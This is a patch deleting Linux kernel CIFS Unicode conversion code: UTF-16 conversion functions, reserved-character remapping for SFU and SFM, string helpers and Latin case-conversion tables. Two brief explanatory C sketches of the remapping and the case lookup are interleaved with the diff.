+-	int nullsize = nls_nullsize(codepage);
+-	int fromwords = fromlen / 2;
+-	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp[3];		/* ftmp[3] = 3array x 2bytes = 6bytes UTF-16 */
+-
+-	/*
+-	 * because the chars can be of varying widths, we need to take care
+-	 * not to overflow the destination buffer when we get close to the
+-	 * end of it. Until we get to this offset, we don't need to check
+-	 * for overflow however.
+-	 */
+-	safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize);
+-
+-	for (i = 0; i < fromwords; i++) {
+-		ftmp[0] = get_unaligned_le16(&from[i]);
+-		if (ftmp[0] == 0)
+-			break;
+-		if (i + 1 < fromwords)
+-			ftmp[1] = get_unaligned_le16(&from[i + 1]);
+-		else
+-			ftmp[1] = 0;
+-		if (i + 2 < fromwords)
+-			ftmp[2] = get_unaligned_le16(&from[i + 2]);
+-		else
+-			ftmp[2] = 0;
+-
+-		/*
+-		 * check to see if converting this character might make the
+-		 * conversion bleed into the null terminator
+-		 */
+-		if (outlen >= safelen) {
+-			charlen = cifs_mapchar(tmp, ftmp, codepage, map_type);
+-			if ((outlen + charlen) > (tolen - nullsize))
+-				break;
+-		}
+-
+-		/* put converted char into 'to' buffer */
+-		charlen = cifs_mapchar(&to[outlen], ftmp, codepage, map_type);
+-		outlen += charlen;
+-
+-		/* charlen (=bytes of UTF-8 for 1 character)
+-		 * 4bytes UTF-8(surrogate pair) is charlen=4
+-		 *   (4bytes UTF-16 code)
+-		 * 7-8bytes UTF-8(IVS) is charlen=3+4 or 4+4
+-		 *   (2 UTF-8 pairs divided to 2 UTF-16 pairs) */
+-		if (charlen == 4)
+-			i++;
+-		else if (charlen >= 5)
+-			/* 5-6bytes UTF-8 */
+-			i += 2;
+-	}
+-
+-	/* properly null-terminate string */
+-	for (i = 0; i < nullsize; i++)
+-		to[outlen++] = 0;
+-
+-	return outlen;
+-}
+-
+-/*
+- * NAME:	cifs_strtoUTF16()
+- *
+- * FUNCTION:	Convert character string to unicode string
+- *
+- */
+-int
+-cifs_strtoUTF16(__le16 *to, const char *from, int len,
+-	      const struct nls_table *codepage)
+-{
+-	int charlen;
+-	int i;
+-	wchar_t wchar_to; /* needed to quiet sparse */
+-
+-	/* special case for utf8 to handle no plane0 chars */
+-	if (!strcmp(codepage->charset, "utf8")) {
+-		/*
+-		 * Convert utf8 -> utf16. We assume there is enough space, as the
+-		 * caller should have ensured the conversion does not overflow the
+-		 * destination; len is the length in wchar_t units (16 bits).
+-		 */
+-		i  = utf8s_to_utf16s(from, len, UTF16_LITTLE_ENDIAN,
+-				       (wchar_t *) to, len);
+-
+-		/* if success terminate and exit */
+-		if (i >= 0)
+-			goto success;
+-		/*
+-		 * if fails fall back to UCS encoding as this
+-		 * function should not return negative values
+-		 * currently can fail only if source contains
+-		 * invalid encoded characters
+-		 */
+-	}
+-
+-	for (i = 0; len && *from; i++, from += charlen, len -= charlen) {
+-		charlen = codepage->char2uni(from, len, &wchar_to);
+-		if (charlen < 1) {
+-			cifs_dbg(VFS, "strtoUTF16: char2uni of 0x%x returned %d\n",
+-				 *from, charlen);
+-			/* A question mark */
+-			wchar_to = 0x003f;
+-			charlen = 1;
+-		}
+-		put_unaligned_le16(wchar_to, &to[i]);
+-	}
+-
+-success:
+-	put_unaligned_le16(0, &to[i]);
+-	return i;
+-}
+-
+-/*
+- * cifs_utf16_bytes - how long will a string be after conversion?
+- * @utf16 - pointer to input string
+- * @maxbytes - don't go past this many bytes of input string
+- * @codepage - destination codepage
+- *
+- * Walk a utf16le string and return the number of bytes that the string will
+- * be after being converted to the given charset, not including any null
+- * termination required. Don't walk past maxbytes in the source buffer.
+- */
+-int
+-cifs_utf16_bytes(const __le16 *from, int maxbytes,
+-		const struct nls_table *codepage)
+-{
+-	int i;
+-	int charlen, outlen = 0;
+-	int maxwords = maxbytes / 2;
+-	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp[3];
+-
+-	for (i = 0; i < maxwords; i++) {
+-		ftmp[0] = get_unaligned_le16(&from[i]);
+-		if (ftmp[0] == 0)
+-			break;
+-		if (i + 1 < maxwords)
+-			ftmp[1] = get_unaligned_le16(&from[i + 1]);
+-		else
+-			ftmp[1] = 0;
+-		if (i + 2 < maxwords)
+-			ftmp[2] = get_unaligned_le16(&from[i + 2]);
+-		else
+-			ftmp[2] = 0;
+-
+-		charlen = cifs_mapchar(tmp, ftmp, codepage, NO_MAP_UNI_RSVD);
+-		outlen += charlen;
+-	}
+-
+-	return outlen;
+-}
+-
+-/*
+- * cifs_strndup_from_utf16 - copy a string from wire format to the local
+- * codepage
+- * @src - source string
+- * @maxlen - don't walk past this many bytes in the source string
+- * @is_unicode - is this a unicode string?
+- * @codepage - destination codepage
+- *
+- * Take a string given by the server, convert it to the local codepage and
+- * put it in a new buffer. Returns a pointer to the new string or NULL on
+- * error.
+- */
+-char *
+-cifs_strndup_from_utf16(const char *src, const int maxlen,
+-			const bool is_unicode, const struct nls_table *codepage)
+-{
+-	int len;
+-	char *dst;
+-
+-	if (is_unicode) {
+-		len = cifs_utf16_bytes((__le16 *) src, maxlen, codepage);
+-		len += nls_nullsize(codepage);
+-		dst = kmalloc(len, GFP_KERNEL);
+-		if (!dst)
+-			return NULL;
+-		cifs_from_utf16(dst, (__le16 *) src, len, maxlen, codepage,
+-				NO_MAP_UNI_RSVD);
+-	} else {
+-		dst = kstrndup(src, maxlen, GFP_KERNEL);
+-	}
+-
+-	return dst;
+-}
+-
+-static __le16 convert_to_sfu_char(char src_char)
+-{
+-	__le16 dest_char;
+-
+-	switch (src_char) {
+-	case ':':
+-		dest_char = cpu_to_le16(UNI_COLON);
+-		break;
+-	case '*':
+-		dest_char = cpu_to_le16(UNI_ASTERISK);
+-		break;
+-	case '?':
+-		dest_char = cpu_to_le16(UNI_QUESTION);
+-		break;
+-	case '<':
+-		dest_char = cpu_to_le16(UNI_LESSTHAN);
+-		break;
+-	case '>':
+-		dest_char = cpu_to_le16(UNI_GRTRTHAN);
+-		break;
+-	case '|':
+-		dest_char = cpu_to_le16(UNI_PIPE);
+-		break;
+-	default:
+-		dest_char = 0;
+-	}
+-
+-	return dest_char;
+-}
+-
+-static __le16 convert_to_sfm_char(char src_char, bool end_of_string)
+-{
+-	__le16 dest_char;
+-
+-	if (src_char >= 0x01 && src_char <= 0x1F) {
+-		dest_char = cpu_to_le16(src_char + 0xF000);
+-		return dest_char;
+-	}
+-	switch (src_char) {
+-	case ':':
+-		dest_char = cpu_to_le16(SFM_COLON);
+-		break;
+-	case '"':
+-		dest_char = cpu_to_le16(SFM_DOUBLEQUOTE);
+-		break;
+-	case '*':
+-		dest_char = cpu_to_le16(SFM_ASTERISK);
+-		break;
+-	case '?':
+-		dest_char = cpu_to_le16(SFM_QUESTION);
+-		break;
+-	case '<':
+-		dest_char = cpu_to_le16(SFM_LESSTHAN);
+-		break;
+-	case '>':
+-		dest_char = cpu_to_le16(SFM_GRTRTHAN);
+-		break;
+-	case '|':
+-		dest_char = cpu_to_le16(SFM_PIPE);
+-		break;
+-	case '.':
+-		if (end_of_string)
+-			dest_char = cpu_to_le16(SFM_PERIOD);
+-		else
+-			dest_char = 0;
+-		break;
+-	case ' ':
+-		if (end_of_string)
+-			dest_char = cpu_to_le16(SFM_SPACE);
+-		else
+-			dest_char = 0;
+-		break;
+-	default:
+-		dest_char = 0;
+-	}
+-
+-	return dest_char;
+-}
+-
+-/*
+- * Convert 16 bit Unicode pathname to wire format from string in current code
+- * page. Conversion may involve remapping the six characters that are
+- * legal only in POSIX-like OSes (if they are present in the string). Path
+- * names are little endian 16 bit Unicode on the wire
+- */
+-int
+-cifsConvertToUTF16(__le16 *target, const char *source, int srclen,
+-		 const struct nls_table *cp, int map_chars)
+-{
+-	int i, charlen;
+-	int j = 0;
+-	char src_char;
+-	__le16 dst_char;
+-	wchar_t tmp;
+-	wchar_t *wchar_to;	/* UTF-16 */
+-	int ret;
+-	unicode_t u;
+-
+-	if (map_chars == NO_MAP_UNI_RSVD)
+-		return cifs_strtoUTF16(target, source, PATH_MAX, cp);
+-
+-	wchar_to = kzalloc(6, GFP_KERNEL);
+-
+-	for (i = 0; i < srclen; j++) {
+-		src_char = source[i];
+-		charlen = 1;
+-
+-		/* check if end of string */
+-		if (src_char == 0)
+-			goto ctoUTF16_out;
+-
+-		/* see if we must remap this char */
+-		if (map_chars == SFU_MAP_UNI_RSVD)
+-			dst_char = convert_to_sfu_char(src_char);
+-		else if (map_chars == SFM_MAP_UNI_RSVD) {
+-			bool end_of_string;
+-
+-			/**
+-			 * Remap spaces and periods found at the end of every
+-			 * component of the path. The special cases of '.' and
+-			 * '..' do not need to be dealt with explicitly because
+-			 * they are addressed in namei.c:link_path_walk().
+-			 **/
+-			if ((i == srclen - 1) || (source[i+1] == '\\'))
+-				end_of_string = true;
+-			else
+-				end_of_string = false;
+-
+-			dst_char = convert_to_sfm_char(src_char, end_of_string);
+-		} else
+-			dst_char = 0;
+-		/*
+-		 * FIXME: We can not handle remapping backslash (UNI_SLASH)
+-		 * until all the calls to build_path_from_dentry are modified,
+-		 * as they use backslash as separator.
+-		 */
+-		if (dst_char == 0) {
+-			charlen = cp->char2uni(source + i, srclen - i, &tmp);
+-			dst_char = cpu_to_le16(tmp);
+-
+-			/*
+-			 * if no match, use question mark, which at least in
+-			 * some cases serves as wild card
+-			 */
+-			if (charlen > 0)
+-				goto ctoUTF16;
+-
+-			/* convert SURROGATE_PAIR */
+-			if (strcmp(cp->charset, "utf8") || !wchar_to)
+-				goto unknown;
+-			if (*(source + i) & 0x80) {
+-				charlen = utf8_to_utf32(source + i, 6, &u);
+-				if (charlen < 0)
+-					goto unknown;
+-			} else
+-				goto unknown;
+-			ret  = utf8s_to_utf16s(source + i, charlen,
+-					       UTF16_LITTLE_ENDIAN,
+-					       wchar_to, 6);
+-			if (ret < 0)
+-				goto unknown;
+-
+-			i += charlen;
+-			dst_char = cpu_to_le16(*wchar_to);
+-			if (charlen <= 3)
+-				/* 1-3bytes UTF-8 to 2bytes UTF-16 */
+-				put_unaligned(dst_char, &target[j]);
+-			else if (charlen == 4) {
+-				/* 4bytes UTF-8(surrogate pair) to 4bytes UTF-16
+-				 * 7-8bytes UTF-8(IVS) divided to 2 UTF-16
+-				 *   (charlen=3+4 or 4+4) */
+-				put_unaligned(dst_char, &target[j]);
+-				dst_char = cpu_to_le16(*(wchar_to + 1));
+-				j++;
+-				put_unaligned(dst_char, &target[j]);
+-			} else if (charlen >= 5) {
+-				/* 5-6bytes UTF-8 to 6bytes UTF-16 */
+-				put_unaligned(dst_char, &target[j]);
+-				dst_char = cpu_to_le16(*(wchar_to + 1));
+-				j++;
+-				put_unaligned(dst_char, &target[j]);
+-				dst_char = cpu_to_le16(*(wchar_to + 2));
+-				j++;
+-				put_unaligned(dst_char, &target[j]);
+-			}
+-			continue;
+-
+-unknown:
+-			dst_char = cpu_to_le16(0x003f);
+-			charlen = 1;
+-		}
+-
+-ctoUTF16:
+-		/*
+-		 * character may take more than one byte in the source string,
+-		 * but will take exactly two bytes in the target string
+-		 */
+-		i += charlen;
+-		put_unaligned(dst_char, &target[j]);
+-	}
+-
+-ctoUTF16_out:
+-	put_unaligned(0, &target[j]); /* Null terminate target unicode string */
+-	kfree(wchar_to);
+-	return j;
+-}
+-
+-/*
+- * cifs_local_to_utf16_bytes - how long will a string be after conversion?
+- * @from - pointer to input string
+- * @maxbytes - don't go past this many bytes of input string
+- * @codepage - source codepage
+- *
+- * Walk a string and return the number of bytes that the string will
+- * be after being converted to the given charset, not including any null
+- * termination required. Don't walk past maxbytes in the source buffer.
+- */
+-
+-static int
+-cifs_local_to_utf16_bytes(const char *from, int len,
+-			  const struct nls_table *codepage)
+-{
+-	int charlen;
+-	int i;
+-	wchar_t wchar_to;
+-
+-	for (i = 0; len && *from; i++, from += charlen, len -= charlen) {
+-		charlen = codepage->char2uni(from, len, &wchar_to);
+-		/* Failed conversion defaults to a question mark */
+-		if (charlen < 1)
+-			charlen = 1;
+-	}
+-	return 2 * i; /* UTF16 characters are two bytes */
+-}
+-
+-/*
+- * cifs_strndup_to_utf16 - copy a string to wire format from the local codepage
+- * @src - source string
+- * @maxlen - don't walk past this many bytes in the source string
+- * @utf16_len - the length of the allocated string in bytes (including null)
+- * @cp - source codepage
+- * @remap - map special chars
+- *
+- * Take a string convert it from the local codepage to UTF16 and
+- * put it in a new buffer. Returns a pointer to the new string or NULL on
+- * error.
+- */
+-__le16 *
+-cifs_strndup_to_utf16(const char *src, const int maxlen, int *utf16_len,
+-		      const struct nls_table *cp, int remap)
+-{
+-	int len;
+-	__le16 *dst;
+-
+-	len = cifs_local_to_utf16_bytes(src, maxlen, cp);
+-	len += 2; /* NULL */
+-	dst = kmalloc(len, GFP_KERNEL);
+-	if (!dst) {
+-		*utf16_len = 0;
+-		return NULL;
+-	}
+-	cifsConvertToUTF16(dst, src, strlen(src), cp, remap);
+-	*utf16_len = len;
+-	return dst;
+-}
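To make the remapping above concrete: SFM parks each NTFS-reserved character in the U+F0xx private-use range on the wire and restores it on the way back. A stand-alone round-trip sketch reusing the SFM_COLON value from cifs_unicode.h:

/* Stand-alone sketch; 0xF022 is the SFM_COLON value from cifs_unicode.h */
#include <stdio.h>

#define SFM_COLON 0xF022

int main(void)
{
	unsigned short wire = SFM_COLON;		/* ':' as sent on the wire */
	char local = (wire == SFM_COLON) ? ':' : '?';	/* convert_sfm_char() step */

	printf("wire 0x%04X <-> local '%c'\n", (unsigned)wire, local);
	return 0;
}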
+diff --git a/fs/cifs/cifs_unicode.h b/fs/cifs/cifs_unicode.h
+deleted file mode 100644
+index 80b3d845419fa..0000000000000
+--- a/fs/cifs/cifs_unicode.h
++++ /dev/null
+@@ -1,404 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- * cifs_unicode:  Unicode kernel case support
+- *
+- * Function:
+- *     Convert a unicode character to upper or lower case using
+- *     compressed tables.
+- *
+- *   Copyright (c) International Business Machines  Corp., 2000,2009
+- *
+- * Notes:
+- *     These APIs are based on the C library functions.  The semantics
+- *     should match the C functions but with expanded size operands.
+- *
+- *     The upper/lower functions are based on a table created by mkupr.
+- *     This is a compressed table of upper and lower case conversion.
+- */
+-#ifndef _CIFS_UNICODE_H
+-#define _CIFS_UNICODE_H
+-
+-#include <asm/byteorder.h>
+-#include <linux/types.h>
+-#include <linux/nls.h>
+-
+-#define  UNIUPR_NOLOWER		/* Example to not expand lower case tables */
+-
+-/*
+- * Windows maps these to the user defined 16 bit Unicode range since they are
+- * reserved symbols (along with \ and /), otherwise illegal to store
+- * in filenames in NTFS
+- */
+-#define UNI_ASTERISK    (__u16) ('*' + 0xF000)
+-#define UNI_QUESTION    (__u16) ('?' + 0xF000)
+-#define UNI_COLON       (__u16) (':' + 0xF000)
+-#define UNI_GRTRTHAN    (__u16) ('>' + 0xF000)
+-#define UNI_LESSTHAN    (__u16) ('<' + 0xF000)
+-#define UNI_PIPE        (__u16) ('|' + 0xF000)
+-#define UNI_SLASH       (__u16) ('\\' + 0xF000)
+-
+-/*
+- * Macs use an older "SFM" mapping of the symbols above. Fortunately it does
+- * not conflict (although it almost does) with the mapping above.
+- */
+-
+-#define SFM_DOUBLEQUOTE ((__u16) 0xF020)
+-#define SFM_ASTERISK    ((__u16) 0xF021)
+-#define SFM_QUESTION    ((__u16) 0xF025)
+-#define SFM_COLON       ((__u16) 0xF022)
+-#define SFM_GRTRTHAN    ((__u16) 0xF024)
+-#define SFM_LESSTHAN    ((__u16) 0xF023)
+-#define SFM_PIPE        ((__u16) 0xF027)
+-#define SFM_SLASH       ((__u16) 0xF026)
+-#define SFM_SPACE	((__u16) 0xF028)
+-#define SFM_PERIOD	((__u16) 0xF029)
+-
+-/*
+- * Mapping mechanism to use when one of the seven reserved characters is
+- * encountered.  We can only map using one of the mechanisms at a time
+- * since otherwise readdir could return directory entries which we would
+- * not be able to open
+- *
+- * NO_MAP_UNI_RSVD  = do not perform any remapping of the character
+- * SFM_MAP_UNI_RSVD = map reserved characters using SFM scheme (MAC compatible)
+- * SFU_MAP_UNI_RSVD = map reserved characters ala SFU ("mapchars" option)
+- *
+- */
+-#define NO_MAP_UNI_RSVD		0
+-#define SFM_MAP_UNI_RSVD	1
+-#define SFU_MAP_UNI_RSVD	2
+-
+-/* Just define what we want from uniupr.h.  We don't want to define the tables
+- * in each source file.
+- */
+-#ifndef	UNICASERANGE_DEFINED
+-struct UniCaseRange {
+-	wchar_t start;
+-	wchar_t end;
+-	signed char *table;
+-};
+-#endif				/* UNICASERANGE_DEFINED */
+-
+-#ifndef UNIUPR_NOUPPER
+-extern signed char CifsUniUpperTable[512];
+-extern const struct UniCaseRange CifsUniUpperRange[];
+-#endif				/* UNIUPR_NOUPPER */
+-
+-#ifndef UNIUPR_NOLOWER
+-extern signed char CifsUniLowerTable[512];
+-extern const struct UniCaseRange CifsUniLowerRange[];
+-#endif				/* UNIUPR_NOLOWER */
+-
+-#ifdef __KERNEL__
+-int cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+-		    const struct nls_table *cp, int map_type);
+-int cifs_utf16_bytes(const __le16 *from, int maxbytes,
+-		     const struct nls_table *codepage);
+-int cifs_strtoUTF16(__le16 *, const char *, int, const struct nls_table *);
+-char *cifs_strndup_from_utf16(const char *src, const int maxlen,
+-			      const bool is_unicode,
+-			      const struct nls_table *codepage);
+-extern int cifsConvertToUTF16(__le16 *target, const char *source, int maxlen,
+-			      const struct nls_table *cp, int mapChars);
+-extern int cifs_remap(struct cifs_sb_info *cifs_sb);
+-extern __le16 *cifs_strndup_to_utf16(const char *src, const int maxlen,
+-				     int *utf16_len, const struct nls_table *cp,
+-				     int remap);
+-#endif
+-
+-wchar_t cifs_toupper(wchar_t in);
+-
+-/*
+- * UniStrcat:  Concatenate the second string to the first
+- *
+- * Returns:
+- *     Address of the first string
+- */
+-static inline __le16 *
+-UniStrcat(__le16 *ucs1, const __le16 *ucs2)
+-{
+-	__le16 *anchor = ucs1;	/* save a pointer to start of ucs1 */
+-
+-	while (*ucs1++) ;	/* To end of first string */
+-	ucs1--;			/* Return to the null */
+-	while ((*ucs1++ = *ucs2++)) ;	/* copy string 2 over */
+-	return anchor;
+-}
+-
+-/*
+- * UniStrchr:  Find a character in a string
+- *
+- * Returns:
+- *     Address of first occurrence of character in string
+- *     or NULL if the character is not in the string
+- */
+-static inline wchar_t *
+-UniStrchr(const wchar_t *ucs, wchar_t uc)
+-{
+-	while ((*ucs != uc) && *ucs)
+-		ucs++;
+-
+-	if (*ucs == uc)
+-		return (wchar_t *) ucs;
+-	return NULL;
+-}
+-
+-/*
+- * UniStrcmp:  Compare two strings
+- *
+- * Returns:
+- *     < 0:  First string is less than second
+- *     = 0:  Strings are equal
+- *     > 0:  First string is greater than second
+- */
+-static inline int
+-UniStrcmp(const wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	while ((*ucs1 == *ucs2) && *ucs1) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int) *ucs1 - (int) *ucs2;
+-}
+-
+-/*
+- * UniStrcpy:  Copy a string
+- */
+-static inline wchar_t *
+-UniStrcpy(wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	wchar_t *anchor = ucs1;	/* save the start of result string */
+-
+-	while ((*ucs1++ = *ucs2++)) ;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrlen:  Return the length of a string (in 16 bit Unicode chars not bytes)
+- */
+-static inline size_t
+-UniStrlen(const wchar_t *ucs1)
+-{
+-	int i = 0;
+-
+-	while (*ucs1++)
+-		i++;
+-	return i;
+-}
+-
+-/*
+- * UniStrnlen:  Return the length (in 16 bit Unicode chars not bytes) of a
+- *		string (length limited)
+- */
+-static inline size_t
+-UniStrnlen(const wchar_t *ucs1, int maxlen)
+-{
+-	int i = 0;
+-
+-	while (*ucs1++) {
+-		i++;
+-		if (i >= maxlen)
+-			break;
+-	}
+-	return i;
+-}
+-
+-/*
+- * UniStrncat:  Concatenate length limited string
+- */
+-static inline wchar_t *
+-UniStrncat(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;	/* save pointer to string 1 */
+-
+-	while (*ucs1++) ;
+-	ucs1--;			/* point to null terminator of s1 */
+-	while (n-- && (*ucs1 = *ucs2)) {	/* copy s2 after s1 */
+-		ucs1++;
+-		ucs2++;
+-	}
+-	*ucs1 = 0;		/* Null terminate the result */
+-	return (anchor);
+-}
+-
+-/*
+- * UniStrncmp:  Compare length limited string
+- */
+-static inline int
+-UniStrncmp(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	if (!n)
+-		return 0;	/* Null strings are equal */
+-	while ((*ucs1 == *ucs2) && *ucs1 && --n) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int) *ucs1 - (int) *ucs2;
+-}
+-
+-/*
+- * UniStrncmp_le:  Compare length limited string - native to little-endian
+- */
+-static inline int
+-UniStrncmp_le(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	if (!n)
+-		return 0;	/* Null strings are equal */
+-	while ((*ucs1 == __le16_to_cpu(*ucs2)) && *ucs1 && --n) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int) *ucs1 - (int) __le16_to_cpu(*ucs2);
+-}
+-
+-/*
+- * UniStrncpy:  Copy length limited string with pad
+- */
+-static inline wchar_t *
+-UniStrncpy(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;
+-
+-	while (n-- && *ucs2)	/* Copy the strings */
+-		*ucs1++ = *ucs2++;
+-
+-	n++;
+-	while (n--)		/* Pad with nulls */
+-		*ucs1++ = 0;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrncpy_le:  Copy length limited string with pad to little-endian
+- */
+-static inline wchar_t *
+-UniStrncpy_le(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;
+-
+-	while (n-- && *ucs2)	/* Copy the strings */
+-		*ucs1++ = __le16_to_cpu(*ucs2++);
+-
+-	n++;
+-	while (n--)		/* Pad with nulls */
+-		*ucs1++ = 0;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrstr:  Find a string in a string
+- *
+- * Returns:
+- *     Address of first match found
+- *     NULL if no matching string is found
+- */
+-static inline wchar_t *
+-UniStrstr(const wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	const wchar_t *anchor1 = ucs1;
+-	const wchar_t *anchor2 = ucs2;
+-
+-	while (*ucs1) {
+-		if (*ucs1 == *ucs2) {
+-			/* Partial match found */
+-			ucs1++;
+-			ucs2++;
+-		} else {
+-			if (!*ucs2)	/* Match found */
+-				return (wchar_t *) anchor1;
+-			ucs1 = ++anchor1;	/* No match */
+-			ucs2 = anchor2;
+-		}
+-	}
+-
+-	if (!*ucs2)		/* Both end together */
+-		return (wchar_t *) anchor1;	/* Match found */
+-	return NULL;		/* No match */
+-}
+-
+-#ifndef UNIUPR_NOUPPER
+-/*
+- * UniToupper:  Convert a unicode character to upper case
+- */
+-static inline wchar_t
+-UniToupper(register wchar_t uc)
+-{
+-	register const struct UniCaseRange *rp;
+-
+-	if (uc < sizeof(CifsUniUpperTable)) {
+-		/* Latin characters */
+-		return uc + CifsUniUpperTable[uc];	/* Use base tables */
+-	} else {
+-		rp = CifsUniUpperRange;	/* Use range tables */
+-		while (rp->start) {
+-			if (uc < rp->start)	/* Before start of range */
+-				return uc;	/* Uppercase = input */
+-			if (uc <= rp->end)	/* In range */
+-				return uc + rp->table[uc - rp->start];
+-			rp++;	/* Try next range */
+-		}
+-	}
+-	return uc;		/* Past last range */
+-}
+-
+-/*
+- * UniStrupr:  Upper case a unicode string
+- */
+-static inline __le16 *
+-UniStrupr(register __le16 *upin)
+-{
+-	register __le16 *up;
+-
+-	up = upin;
+-	while (*up) {		/* For all characters */
+-		*up = cpu_to_le16(UniToupper(le16_to_cpu(*up)));
+-		up++;
+-	}
+-	return upin;		/* Return input pointer */
+-}
+-#endif				/* UNIUPR_NOUPPER */
+-
+-#ifndef UNIUPR_NOLOWER
+-/*
+- * UniTolower:  Convert a unicode character to lower case
+- */
+-static inline wchar_t
+-UniTolower(register wchar_t uc)
+-{
+-	register const struct UniCaseRange *rp;
+-
+-	if (uc < sizeof(CifsUniLowerTable)) {
+-		/* Latin characters */
+-		return uc + CifsUniLowerTable[uc];	/* Use base tables */
+-	} else {
+-		rp = CifsUniLowerRange;	/* Use range tables */
+-		while (rp->start) {
+-			if (uc < rp->start)	/* Before start of range */
+-				return uc;	/* Lowercase = input */
+-			if (uc <= rp->end)	/* In range */
+-				return uc + rp->table[uc - rp->start];
+-			rp++;	/* Try next range */
+-		}
+-	}
+-	return uc;		/* Past last range */
+-}
+-
+-/*
+- * UniStrlwr:  Lower case a unicode string
+- */
+-static inline wchar_t *
+-UniStrlwr(register wchar_t *upin)
+-{
+-	register wchar_t *up;
+-
+-	up = upin;
+-	while (*up) {		/* For all characters */
+-		*up = UniTolower(*up);
+-		up++;
+-	}
+-	return upin;		/* Return input pointer */
+-}
+-
+-#endif
+-
+-#endif /* _CIFS_UNICODE_H */
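UniToupper() and UniTolower() above implement a two-level scheme: a 512-entry base table of signed deltas covers Latin code points, and range tables cover the rest. A stand-alone sketch of the base-table step, using the -32 delta that CifsUniUpperTable (in cifs_uniupr.h, below) stores for 'a':

/* Stand-alone sketch of the base-table lookup performed by UniToupper() */
#include <stdio.h>

int main(void)
{
	signed char delta = -32;		/* CifsUniUpperTable[0x61] */
	unsigned short uc = 0x61 + delta;	/* 'a' -> 'A' */

	printf("0x61 + (%d) = 0x%02X ('%c')\n", delta, (unsigned)uc, uc);
	return 0;
}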
+diff --git a/fs/cifs/cifs_uniupr.h b/fs/cifs/cifs_uniupr.h
+deleted file mode 100644
+index 7b272fcdf0d3a..0000000000000
+--- a/fs/cifs/cifs_uniupr.h
++++ /dev/null
+@@ -1,239 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (c) International Business Machines  Corp., 2000,2002
+- *
+- * uniupr.h - Unicode compressed case ranges
+-*/
+-
+-#ifndef UNIUPR_NOUPPER
+-/*
+- * Latin upper case
+- */
+-signed char CifsUniUpperTable[512] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 040-04f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 050-05f */
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 060-06f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, 0, 0, 0, 0, 0,	/* 070-07f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0c0-0cf */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0d0-0df */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 0e0-0ef */
+-	-32, -32, -32, -32, -32, -32, -32, 0, -32, -32, -32, -32, -32, -32, -32, 121,	/* 0f0-0ff */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 100-10f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 110-11f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 120-12f */
+-	0, 0, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 130-13f */
+-	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1,	/* 140-14f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 150-15f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 160-16f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 170-17f */
+-	0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0, 0,	/* 180-18f */
+-	0, 0, -1, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0,	/* 190-19f */
+-	0, -1, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, 0, -1, 0, 0,	/* 1a0-1af */
